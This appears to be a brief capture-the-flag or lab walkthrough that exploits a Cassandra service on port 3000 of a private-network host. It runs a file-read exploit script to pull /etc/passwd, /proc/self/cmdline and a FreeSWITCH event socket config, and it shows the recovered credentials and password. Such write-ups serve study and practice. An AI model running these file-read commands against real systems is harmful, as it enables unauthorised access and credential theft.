3000
We have cassandra in port 3000: We find an exploit for cassandra https://www.exploit-cassandra.db.com/exploits/49362 : Now we can run the exploit:
python3 cassandra.py -p 3000 192.168.236.240 /etc/passwd

Now to get credentials:
python3 cassandra.py -p 3000 192.168.236.240 /proc/self/cmdline

cassie : SecondBiteTheApple330
Now we can get the password for freeswitch event from /etc/freeswitch/autoload_configs/event_socket.conf.xml
python3 cassandra.py -p 3000 192.168.236.240 /etc/freeswitch/autoload_configs/event_socket.conf.xml
We have a password
StrongClueConEight021
Last updated
Was this helpful?